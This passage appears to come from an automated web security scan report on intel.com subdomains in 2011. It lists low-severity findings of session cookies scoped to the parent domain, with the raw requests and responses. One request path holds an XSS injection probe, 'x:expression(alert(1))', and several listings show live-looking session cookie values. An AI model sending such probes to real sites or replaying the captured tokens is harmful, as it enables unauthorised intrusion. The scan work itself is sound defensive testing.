Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

11.18. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: newsroom.intel.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=0F9AA48CBC22DD7A7D0A421E6737E14C.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
X-JAL: 17
Content-Language: en-US
CacheHit: D=26624 t=1296957380484009
X-JSL: D=26628 t=1296957380484009
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

11.19. http://newsroom.intel.com/render-widget!execute.jspa  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /render-widget!execute.jspa HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Origin: http://newsroom.intel.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947574107; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA
Content-Length: 65

frameID=15023&size=1&widgetType=3&container=2016&containerType=14

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=6A2D969FD2F865ED814073478F5CD886.node6IPR; Domain=.intel.com; Path=/
X-JAL: 435
Content-Language: en-US
CacheHit: D=437180 t=1296956932677160
X-JSL: D=437186 t=1296956932677160
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large"></div>
<div class="content-small">

<ul class="jive-sidebar-rssfeed">
<li>
<span>Feb 2, 2011</span>

...[SNIP]...

11.20. http://newsroom.intel.com/theme/white/styles/theme.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /theme/white/styles/theme.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /theme/white/styles/theme.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=7359014C358600335C62FA09C3BE0B68.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=130334 t=1296956932271743
X-JSL: D=130341 t=1296956932271743
Content-Type: text/css
Connection: keep-alive
Content-Length: 2317


/* main default header */
#jive-global-header {
background: #dedede url(../images/jive-hdr-bg1.png) repeat-x top;
border-bottom: 1px #e9e9e9 solid;
}
#jive-global-header-texture {
bac
...[SNIP]...

11.21. https://secure-newsroom.intel.com/cs_login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure-newsroom.intel.com
Path:   /cs_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs_login HTTP/1.1
Host: secure-newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 23:16:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=A4CC37F1E2D36D9C40FE66EF20991E8D.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-JAL: 0
Location: https://secure-newsroom.intel.com/login.jspa
Content-Length: 0
CacheHit: D=2495 t=1296947795404257
X-JSL: D=2500 t=1296947795404257
Connection: close
Content-Type: text/plain; charset=UTF-8


11.22. http://software.intel.com/en-us/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
Date: Sat, 05 Feb 2011 23:21:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=80d3b7dbc1c511eec9e30e6313957d55; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 77398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<he
...[SNIP]...

11.23. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/articles/intel-cloud-builders-overview/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=9b9329ab03330eb2995d6e0b7cd5ee03; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 44663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.24. http://software.intel.com/en-us/blogs/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b4b0122969a1cad358c7d154e5df9808; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 52451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.25. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=c6f20ace22b45018ab76495ba5248e67; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 42232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.26. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:58 GMT
Content-Length: 2468
Connection: close
Set-Cookie: PHPSESSID=102cf9ecae8791b0e6286744c176e520; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:58 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.27. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=5835ba1bbad9f78b6863c69132a212a2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.28. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:55 GMT
Content-Length: 537
Connection: close
Set-Cookie: PHPSESSID=94087cf7981dbc449a184ad7e31d34d0; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:55 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.29. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=bdd17db69f4af41eb346e39496779504; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.30. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:52 GMT
Content-Length: 1181
Connection: close
Set-Cookie: PHPSESSID=288fc6a5a0c3418583dcc32f57fcb672; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:52 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.31. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=a4e51d252757c97212e7d2d038ee7a76; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.32. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:55 GMT
Content-Length: 519
Connection: close
Set-Cookie: PHPSESSID=43768f37fef278f86fa1efb8d4f61896; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:55 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.33. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=23acb205107344b897198d1b0053cbc6; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.34. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:50 GMT
Content-Length: 512
Connection: close
Set-Cookie: PHPSESSID=de5232cce9bb1b07e0e2c06efb170581; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:50 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.35. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3132f08882351b5b69f11ba86bbd295a; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36511

